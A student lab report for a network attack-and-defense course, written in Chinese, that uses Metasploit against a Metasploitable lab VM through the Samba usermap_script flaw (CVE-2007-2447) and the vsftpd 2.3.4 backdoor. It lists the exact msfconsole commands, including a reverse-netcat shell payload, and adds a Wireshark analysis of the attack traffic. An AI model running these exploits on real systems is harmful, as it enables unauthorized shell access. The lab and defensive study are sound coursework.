20222817 2022-2023-2《网络攻防实践》第七周作业

本文介绍了使用Metasploit对Linux主机进行远程渗透攻击的实践,包括利用Samba服务的Usermap_script漏洞和Vsftpd后门漏洞。同时展示了防守方如何通过Wireshark进行网络监听和分析攻击过程,强调了及时发现和修复系统漏洞的重要性。
摘要由CSDN通过智能技术生成

目录

1.实践内容

2.实践过程

2.1 实践环境

2.2 实践一:使用Metasploit对Linux主机进行远程渗透攻击

2.3 实践二:攻防对抗实践

3.学习中遇到的问题及解决

4.实践总结


1.实践内容

1.使用Metasploit进行Linux远程渗透攻击:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。

Samba是什么?
Samba是在Linux和UNIX系统上实现SMB (Server Messages Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。

username_script 是什么?
Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行,影响Samba的3.0.20到3.0.25rc3 版本,当使用非默认的用户名映射脚本配置选项时产生,通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令。

2.攻防对抗实践:

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击;

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程。

2.实践过程

2.1 实践环境

攻击机:Kali Linux攻击机,其中装有Metasploit Framework渗透程序,IP地址为192.168.200.4
靶机:Metasploitable Ubuntu,IP地址为192.168.200.123

2.2 实践一:使用Metasploit对Linux主机进行远程渗透攻击

打开msfconsole,进入Metasploit命令行界面。

在msf的命令行中,运行命令use exploit/multi/samba/usermap_script,使用Linux靶机上的Samba服务Usermap_script安全漏洞。
运行命令show payloads,显示这个漏洞可用的负载。 

如果没有选择负载,Metasploit会默认选择负载cmd/unix/reverse_netcat。
我们也可以运行命令set payload cmd/unix/reverse_netcat,手动选择这个负载。 

设置攻击目标为Metasploitable ubuntu靶机。set RHOST 192.168.200.123
设置攻击者为本机set LHOST 192.168.200.4,如果不设置,系统也会默认攻击者为本机。
运行命令run,开始攻击。 

输入shell,回车,进入命令行;输入ifconfig查看IP地址,发现这里显示的IP地址就是靶机的IP地址,说明我们已经成功获取到了靶机的访问权限。 

 

2.3 实践二:攻防对抗实践

这里,我们选择vsftpd后门漏洞。
攻击方打开msfconsole,运行命令search vsftpd,搜索可用漏洞。

输入use exploit/unix/ftp/vsftpd_234_backdoor,选择这个漏洞。 

如果没有选择载荷的话,msf6可能会自动选择一个载荷。
当然,通过运行显示载荷命令show payloads可以发现,这个漏洞只有这一个载荷。 

可以运行这个指令手动选择它:set payload cmd/unix/interact
设置靶机地址set RHOST 192.168.200.123
设置攻击机地址set LHOST 192.168.200.4
防守方打开Wireshark,开始抓包监听。这里打开了同一网络下一台Ubuntu主机的Wireshark。
在攻击机上输入run,开始攻击。 

输入shell,回车,进入命令行;输入ifconfig查看IP地址,发现这里显示的IP地址就是靶机的IP地址,说明攻击方已经成功获取到了防守方的访问权限。 

防守方从Wireshack上抓到了一些包。 

首先,靶机在收到攻击机的请求后,靶机的FTP协议向攻击机返回了vsFTPd的版本号2.3.4(分组编号:22)
然后,攻击机向靶机发送请求:用户是TKIYaQ:)(分组编号:24)
之后,靶机要求攻击机提供该账户的密码(分组编号:26),攻击机向靶机提供了密码k(分组编号:28)
最后,靶机的FTP服务端验证账户密码是正确的,建立连接,成功建立会话。
跟踪这个TCP流,可以得到如下信息:vsFTPd的版本号是2.3.4;用户是TKIYaQ:);密码是k。 

攻击方还输入了ifconfig查看IP地址,发现这里显示的IP地址就是防守方的IP地址,说明攻击方已经成功获取到了防守方的访问权限。 

3.学习中遇到的问题及解决

暂未发现问题。

4.实践总结

通过本实验使用Usermap_script漏洞进行渗透攻击的过程,我们可以充分看出Linux系统中某些严重的漏洞的危险性,这些漏洞可能会使数据和财产受到严重损害;还让我们充分地认识到及早发现、尽早修复漏洞的重要性。

 

 

 

 

 

 

 

 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值